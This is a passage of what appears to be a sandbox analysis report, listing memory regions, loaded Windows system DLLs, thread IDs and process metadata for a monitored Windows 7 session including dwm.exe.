"pagefile_0x0000000000230000" filename = "" Region: id = 38682 start_va = 0xb80000 end_va = 0xc5efff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000b80000" filename = "" Region: id = 38683 start_va = 0x75c10000 end_va = 0x75c38fff entry_point = 0x75c10000 region_type = mapped_file name = "winsta.dll" filename = "\\Windows\\System32\\winsta.dll" (normalized: "c:\\windows\\system32\\winsta.dll") Region: id = 38684 start_va = 0x1b40000 end_va = 0x1e0efff entry_point = 0x1b40000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 38685 start_va = 0x3f0000 end_va = 0x44bfff entry_point = 0x3f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38686 start_va = 0x3f0000 end_va = 0x44bfff entry_point = 0x3f0000 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 38687 start_va = 0x75ba0000 end_va = 0x75babfff entry_point = 0x75ba0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 38690 start_va = 0x240000 end_va = 0x241fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000240000" filename = "" Region: id = 38691 start_va = 0x74c00000 end_va = 0x74d9dfff entry_point = 0x74c00000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\\comctl32.dll") Region: id = 38692 start_va = 0x250000 end_va = 0x250fff 
entry_point = 0x250000 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 38693 start_va = 0x260000 end_va = 0x261fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000260000" filename = "" Region: id = 38694 start_va = 0x370000 end_va = 0x393fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38695 start_va = 0x3b0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000003b0000" filename = "" Region: id = 38696 start_va = 0x74620000 end_va = 0x7471afff entry_point = 0x74620000 region_type = mapped_file name = "windowscodecs.dll" filename = "\\Windows\\System32\\WindowsCodecs.dll" (normalized: "c:\\windows\\system32\\windowscodecs.dll") Region: id = 38697 start_va = 0x250000 end_va = 0x250fff entry_point = 0x0 region_type = private name = "private_0x0000000000250000" filename = "" Region: id = 38698 start_va = 0x3a0000 end_va = 0x3a8fff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 38699 start_va = 0x3f0000 end_va = 0x413fff entry_point = 0x0 region_type = private name = "private_0x00000000003f0000" filename = "" Region: id = 38700 start_va = 0x420000 end_va = 0x428fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 38701 start_va = 0x1e10000 end_va = 0x1f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e10000" filename = "" Region: id = 38702 start_va = 0x75c50000 end_va = 0x75c5afff entry_point = 0x75c50000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 38703 start_va = 0xa70000 end_va = 0xafffff entry_point = 0x0 region_type = private name = "private_0x0000000000a70000" filename = "" Region: id 
= 38704 start_va = 0x370000 end_va = 0x396fff entry_point = 0x0 region_type = private name = "private_0x0000000000370000" filename = "" Region: id = 38705 start_va = 0xb00000 end_va = 0xb39fff entry_point = 0x0 region_type = private name = "private_0x0000000000b00000" filename = "" Region: id = 38706 start_va = 0x1f10000 end_va = 0x1f69fff entry_point = 0x0 region_type = private name = "private_0x0000000001f10000" filename = "" Region: id = 38707 start_va = 0x728c0000 end_va = 0x7290bfff entry_point = 0x728c0000 region_type = mapped_file name = "apphelp.dll" filename = "\\Windows\\System32\\apphelp.dll" (normalized: "c:\\windows\\system32\\apphelp.dll") Region: id = 38708 start_va = 0x3a0000 end_va = 0x3a0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003a0000" filename = "" Region: id = 38709 start_va = 0x760d0000 end_va = 0x76152fff entry_point = 0x760d0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 38710 start_va = 0x3f0000 end_va = 0x3f0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003f0000" filename = "" Region: id = 38711 start_va = 0x72880000 end_va = 0x728b0fff entry_point = 0x72880000 region_type = mapped_file name = "ehstorshell.dll" filename = "\\Windows\\System32\\EhStorShell.dll" (normalized: "c:\\windows\\system32\\ehstorshell.dll") Region: id = 38712 start_va = 0x72470000 end_va = 0x7287afff entry_point = 0x72470000 region_type = mapped_file name = "grooveex.dll" filename = "\\PROGRA~1\\MICROS~1\\Office14\\GROOVEEX.DLL" (normalized: "c:\\progra~1\\micros~1\\office14\\grooveex.dll") Region: id = 38714 start_va = 0x400000 end_va = 0x402fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000400000" filename = "" Region: id = 38715 start_va = 0x723c0000 end_va = 0x72462fff entry_point = 0x723c0000 region_type = mapped_file name = "msvcr90.dll" filename 
= "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcr90.dll") Region: id = 38716 start_va = 0x72330000 end_va = 0x723bdfff entry_point = 0x72330000 region_type = mapped_file name = "msvcp90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\\msvcp90.dll") Region: id = 38717 start_va = 0x72300000 end_va = 0x7232afff entry_point = 0x72300000 region_type = mapped_file name = "atl90.dll" filename = "\\Windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\ATL90.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.vc90.atl_1fc8b3b9a1e18e3b_9.0.30729.6161_none_51cd0a7abbe4e19b\\atl90.dll") Region: id = 38718 start_va = 0x1f70000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 38719 start_va = 0x2150000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002150000" filename = "" Region: id = 38720 start_va = 0x410000 end_va = 0x413fff entry_point = 0x0 region_type = private name = "private_0x0000000000410000" filename = "" Region: id = 38721 start_va = 0x420000 end_va = 0x437fff entry_point = 0x0 region_type = private name = "private_0x0000000000420000" filename = "" Region: id = 38722 start_va = 0x440000 end_va = 0x44ffff entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 38723 start_va = 0xc60000 end_va = 0xc60fff entry_point = 0x0 region_type = private name = "private_0x0000000000c60000" filename = "" Region: id = 38724 start_va = 0xc70000 end_va = 0xc7ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000c70000" filename = "" Region: id = 38725 start_va = 0xc80000 end_va = 0xc8ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c80000" filename = "" Region: id = 38726 start_va = 0xc90000 end_va = 0xc9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000c90000" filename = "" Region: id = 38727 start_va = 0xca0000 end_va = 0xcaffff entry_point = 0x0 region_type = private name = "private_0x0000000000ca0000" filename = "" Region: id = 38728 start_va = 0x1f70000 end_va = 0x1f7ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f70000" filename = "" Region: id = 38729 start_va = 0x2140000 end_va = 0x214ffff entry_point = 0x0 region_type = private name = "private_0x0000000002140000" filename = "" Region: id = 38730 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 38731 start_va = 0x1f80000 end_va = 0x1f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f80000" filename = "" Region: id = 38732 start_va = 0x71ee0000 end_va = 0x722f9fff entry_point = 0x71ee0000 region_type = mapped_file name = "office.odf" filename = "\\PROGRA~1\\COMMON~1\\MICROS~1\\OFFICE14\\Cultures\\OFFICE.ODF" (normalized: "c:\\progra~1\\common~1\\micros~1\\office14\\cultures\\office.odf") Region: id = 38733 start_va = 0x1f90000 end_va = 0x1f9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001f90000" filename = "" Region: id = 38734 start_va = 0x1fa0000 end_va = 0x1faffff entry_point = 0x0 region_type = private name = "private_0x0000000001fa0000" filename = "" Region: id = 38735 start_va = 0x1fb0000 end_va = 0x1fbffff entry_point = 0x0 region_type = private name = "private_0x0000000001fb0000" filename = "" Region: id = 38736 start_va = 0x71670000 end_va = 0x71ed3fff entry_point = 0x71670000 region_type = mapped_file name = "grooveintlresource.dll" filename = 
"\\PROGRA~1\\MICROS~1\\Office14\\1033\\GrooveIntlResource.dll" (normalized: "c:\\progra~1\\micros~1\\office14\\1033\\grooveintlresource.dll") Region: id = 38737 start_va = 0x1fc0000 end_va = 0x1fcffff entry_point = 0x0 region_type = private name = "private_0x0000000001fc0000" filename = "" Region: id = 38738 start_va = 0x1fd0000 end_va = 0x1fdffff entry_point = 0x0 region_type = private name = "private_0x0000000001fd0000" filename = "" Region: id = 38739 start_va = 0x1fe0000 end_va = 0x1feffff entry_point = 0x0 region_type = private name = "private_0x0000000001fe0000" filename = "" Region: id = 38740 start_va = 0x71600000 end_va = 0x71669fff entry_point = 0x71600000 region_type = mapped_file name = "cscui.dll" filename = "\\Windows\\System32\\cscui.dll" (normalized: "c:\\windows\\system32\\cscui.dll") Region: id = 38741 start_va = 0x715f0000 end_va = 0x715f8fff entry_point = 0x715f0000 region_type = mapped_file name = "cscdll.dll" filename = "\\Windows\\System32\\cscdll.dll" (normalized: "c:\\windows\\system32\\cscdll.dll") Region: id = 38743 start_va = 0x1ff0000 end_va = 0x1ff1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ff0000" filename = "" Region: id = 38744 start_va = 0x715e0000 end_va = 0x715eafff entry_point = 0x715e0000 region_type = mapped_file name = "cscapi.dll" filename = "\\Windows\\System32\\cscapi.dll" (normalized: "c:\\windows\\system32\\cscapi.dll") Region: id = 38747 start_va = 0x71570000 end_va = 0x715dffff entry_point = 0x71570000 region_type = mapped_file name = "ntshrui.dll" filename = "\\Windows\\System32\\ntshrui.dll" (normalized: "c:\\windows\\system32\\ntshrui.dll") Region: id = 38748 start_va = 0x753c0000 end_va = 0x753d8fff entry_point = 0x753c0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 38749 start_va = 0x2060000 end_va = 0x209ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000002060000" filename = "" Region: id = 38750 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38751 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Region: id = 38752 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38753 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38754 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38755 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38756 start_va = 0x71560000 end_va = 0x71565fff entry_point = 0x71560000 region_type = mapped_file name = "iconcodecservice.dll" filename = "\\Windows\\System32\\IconCodecService.dll" (normalized: "c:\\windows\\system32\\iconcodecservice.dll") Region: id = 38757 start_va = 0x20a0000 end_va = 0x211ffff entry_point = 0x0 region_type = private name = "private_0x00000000020a0000" filename = "" Region: id = 38758 start_va = 0x2000000 end_va = 0x2000fff entry_point = 0x0 region_type = private name = "private_0x0000000002000000" filename = "" Region: id = 38759 start_va = 0x2010000 end_va = 0x2010fff entry_point = 0x0 
region_type = private name = "private_0x0000000002010000" filename = "" Region: id = 38760 start_va = 0x2350000 end_va = 0x254ffff entry_point = 0x0 region_type = private name = "private_0x0000000002350000" filename = "" Region: id = 38761 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38762 start_va = 0x72b80000 end_va = 0x73ed5fff entry_point = 0x72b80000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 38763 start_va = 0x714f0000 end_va = 0x71551fff entry_point = 0x714f0000 region_type = mapped_file name = "iedkcs32.dll" filename = "\\Windows\\System32\\iedkcs32.dll" (normalized: "c:\\windows\\system32\\iedkcs32.dll") Region: id = 38764 start_va = 0x1e10000 end_va = 0x1e22fff entry_point = 0x1e10000 region_type = mapped_file name = "iedkcs32.dll.mui" filename = "\\Windows\\System32\\en-US\\iedkcs32.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\iedkcs32.dll.mui") Region: id = 38765 start_va = 0x1e10000 end_va = 0x1e3dfff entry_point = 0x1e10000 region_type = mapped_file name = "ie4uinit.exe" filename = "\\Windows\\System32\\ie4uinit.exe" (normalized: "c:\\windows\\system32\\ie4uinit.exe") Region: id = 38766 start_va = 0x1e40000 end_va = 0x1e40fff entry_point = 0x1e40000 region_type = mapped_file name = "ie4uinit.exe.mui" filename = "\\Windows\\System32\\en-US\\ie4uinit.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\ie4uinit.exe.mui") Region: id = 38768 start_va = 0x1e10000 end_va = 0x1e11fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001e10000" filename = "" Region: id = 38769 start_va = 0x1e60000 end_va = 0x1e9ffff entry_point = 0x0 region_type = private name = "private_0x0000000001e60000" filename = "" Region: id = 38770 start_va = 
0x75740000 end_va = 0x75755fff entry_point = 0x75740000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 38771 start_va = 0x7ffdc000 end_va = 0x7ffdcfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdc000" filename = "" Region: id = 38772 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38773 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38774 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38775 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38776 start_va = 0x1e20000 end_va = 0x1e5bfff entry_point = 0x1e20000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38777 start_va = 0x754e0000 end_va = 0x7551afff entry_point = 0x754e0000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 38778 start_va = 0x75c40000 end_va = 0x75c4dfff entry_point = 0x75c40000 region_type = mapped_file name = "rpcrtremote.dll" filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll") Region: id = 38780 start_va = 0x1e20000 end_va = 0x1e5ffff 
entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 38781 start_va = 0x2220000 end_va = 0x225ffff entry_point = 0x0 region_type = private name = "private_0x0000000002220000" filename = "" Region: id = 38782 start_va = 0x2290000 end_va = 0x22cffff entry_point = 0x0 region_type = private name = "private_0x0000000002290000" filename = "" Region: id = 38783 start_va = 0x2340000 end_va = 0x234ffff entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 38784 start_va = 0x744e0000 end_va = 0x744eefff entry_point = 0x744e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 38785 start_va = 0x7ffd8000 end_va = 0x7ffd8fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 38786 start_va = 0x7ffd9000 end_va = 0x7ffd9fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd9000" filename = "" Region: id = 38787 start_va = 0x7ffdb000 end_va = 0x7ffdbfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 38788 start_va = 0x2560000 end_va = 0x259ffff entry_point = 0x0 region_type = private name = "private_0x0000000002560000" filename = "" Region: id = 38789 start_va = 0x747c0000 end_va = 0x747f7fff entry_point = 0x747c0000 region_type = mapped_file name = "sndvolsso.dll" filename = "\\Windows\\System32\\SndVolSSO.dll" (normalized: "c:\\windows\\system32\\sndvolsso.dll") Region: id = 38790 start_va = 0x7ffd7000 end_va = 0x7ffd7fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd7000" filename = "" Region: id = 38791 start_va = 0x1ea0000 end_va = 0x1ea1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ea0000" filename = "" Region: id = 38792 start_va = 0x747b0000 end_va = 0x747b8fff entry_point = 0x747b0000 
region_type = mapped_file name = "hid.dll" filename = "\\Windows\\System32\\hid.dll" (normalized: "c:\\windows\\system32\\hid.dll") Region: id = 38793 start_va = 0x74770000 end_va = 0x747a8fff entry_point = 0x74770000 region_type = mapped_file name = "mmdevapi.dll" filename = "\\Windows\\System32\\MMDevAPI.dll" (normalized: "c:\\windows\\system32\\mmdevapi.dll") Region: id = 38794 start_va = 0x75810000 end_va = 0x7583afff entry_point = 0x75810000 region_type = mapped_file name = "netjoin.dll" filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll") Region: id = 38795 start_va = 0x744f0000 end_va = 0x744f8fff entry_point = 0x744f0000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 38796 start_va = 0x712a0000 end_va = 0x71555fff entry_point = 0x712a0000 region_type = mapped_file name = "themeui.dll" filename = "\\Windows\\System32\\themeui.dll" (normalized: "c:\\windows\\system32\\themeui.dll") Region: id = 38798 start_va = 0x71220000 end_va = 0x71297fff entry_point = 0x71220000 region_type = mapped_file name = "timedate.cpl" filename = "\\Windows\\System32\\timedate.cpl" (normalized: "c:\\windows\\system32\\timedate.cpl") Region: id = 38799 start_va = 0x74030000 end_va = 0x74043fff entry_point = 0x74030000 region_type = mapped_file name = "atl.dll" filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll") Region: id = 38800 start_va = 0x25a0000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 38801 start_va = 0x2780000 end_va = 0x30affff entry_point = 0x2780000 region_type = mapped_file name = "staticcache.dat" filename = "\\Windows\\Fonts\\StaticCache.dat" (normalized: "c:\\windows\\fonts\\staticcache.dat") Region: id = 38802 start_va = 0x1eb0000 end_va = 0x1eb0fff entry_point = 0x0 region_type = private name = 
"private_0x0000000001eb0000" filename = "" Region: id = 38803 start_va = 0x1ec0000 end_va = 0x1ec2fff entry_point = 0x1ec0000 region_type = mapped_file name = "comctl32.dll.mui" filename = "\\Windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_en-us_581cd2bf5825dde9\\comctl32.dll.mui") Region: id = 38804 start_va = 0x1ed0000 end_va = 0x1ed0fff entry_point = 0x0 region_type = private name = "private_0x0000000001ed0000" filename = "" Region: id = 38805 start_va = 0x25a0000 end_va = 0x269ffff entry_point = 0x0 region_type = private name = "private_0x00000000025a0000" filename = "" Region: id = 38806 start_va = 0x2740000 end_va = 0x277ffff entry_point = 0x0 region_type = private name = "private_0x0000000002740000" filename = "" Region: id = 38807 start_va = 0x1ee0000 end_va = 0x1f05fff entry_point = 0x0 region_type = private name = "private_0x0000000001ee0000" filename = "" Region: id = 38808 start_va = 0x2020000 end_va = 0x2028fff entry_point = 0x0 region_type = private name = "private_0x0000000002020000" filename = "" Region: id = 38809 start_va = 0x30c0000 end_va = 0x30fffff entry_point = 0x0 region_type = private name = "private_0x00000000030c0000" filename = "" Region: id = 38810 start_va = 0x7ffd6000 end_va = 0x7ffd6fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd6000" filename = "" Thread: id = 1215 os_tid = 0x474 Thread: id = 1216 os_tid = 0x478 Thread: id = 1217 os_tid = 0x480 Thread: id = 1219 os_tid = 0x484 Thread: id = 1220 os_tid = 0x488 Thread: id = 1221 os_tid = 0x48c Thread: id = 1222 os_tid = 0x490 Thread: id = 1223 os_tid = 0x494 Thread: id = 1224 os_tid = 0x498 Process: id = "681" image_name = "dwm.exe" filename = "c:\\windows\\system32\\dwm.exe" page_root = "0x7f1d1280" os_pid = "0x4a8" os_integrity_level = "0x2000" os_privileges = 
"0x800000" monitor_reason = "child_process" parent_id = "674" os_parent_pid = "0x32c" cmd_line = "\"C:\\Windows\\system32\\Dwm.exe\"" cur_dir = "C:\\Windows\\system32\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000d91c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 38818 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 38819 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 38820 start_va = 0xf0000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 38821 start_va = 0x6e0000 end_va = 0x6f9fff entry_point = 0x6e0000 region_type = mapped_file name = "dwm.exe" filename = "\\Windows\\System32\\dwm.exe" (normalized: "c:\\windows\\system32\\dwm.exe") Region: id = 38822 start_va = 0x77b00000 end_va = 0x77c3bfff entry_point = 0x77b00000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 38823 start_va = 0x77d40000 end_va = 0x77d40fff entry_point = 0x77d40000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 38824 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 38825 start_va = 0x7ffd3000 end_va = 0x7ffd3fff entry_point = 0x0 region_type = private name = 
"private_0x000000007ffd3000" filename = "" Region: id = 38826 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 38830 start_va = 0x40000 end_va = 0x41fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 38831 start_va = 0x130000 end_va = 0x25ffff entry_point = 0x0 region_type = private name = "private_0x0000000000130000" filename = "" Region: id = 38832 start_va = 0x77990000 end_va = 0x77a63fff entry_point = 0x77990000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 38833 start_va = 0x75eb0000 end_va = 0x75ef9fff entry_point = 0x75eb0000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 38834 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 38835 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 38836 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 38837 start_va = 0x77160000 end_va = 0x771adfff entry_point = 0x77160000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 38838 start_va = 0x77780000 end_va = 0x77848fff entry_point = 0x77780000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 38839 start_va = 0x77c60000 end_va = 
0x77c69fff entry_point = 0x77c60000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 38840 start_va = 0x77210000 end_va = 0x772acfff entry_point = 0x77210000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 38841 start_va = 0x75f50000 end_va = 0x75ffbfff entry_point = 0x75f50000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 38842 start_va = 0x74a80000 end_va = 0x74abffff entry_point = 0x74a80000 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 38843 start_va = 0x77100000 end_va = 0x7711efff entry_point = 0x77100000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 38844 start_va = 0x763d0000 end_va = 0x7649bfff entry_point = 0x763d0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 38845 start_va = 0x711f0000 end_va = 0x7120afff entry_point = 0x711f0000 region_type = mapped_file name = "dwmredir.dll" filename = "\\Windows\\System32\\dwmredir.dll" (normalized: "c:\\windows\\system32\\dwmredir.dll") Region: id = 38853 start_va = 0x71070000 end_va = 0x711c0fff entry_point = 0x71070000 region_type = mapped_file name = "dwmcore.dll" filename = "\\Windows\\System32\\dwmcore.dll" (normalized: "c:\\windows\\system32\\dwmcore.dll") Region: id = 38857 start_va = 0x76000000 end_va = 0x7609ffff entry_point = 0x76000000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") 
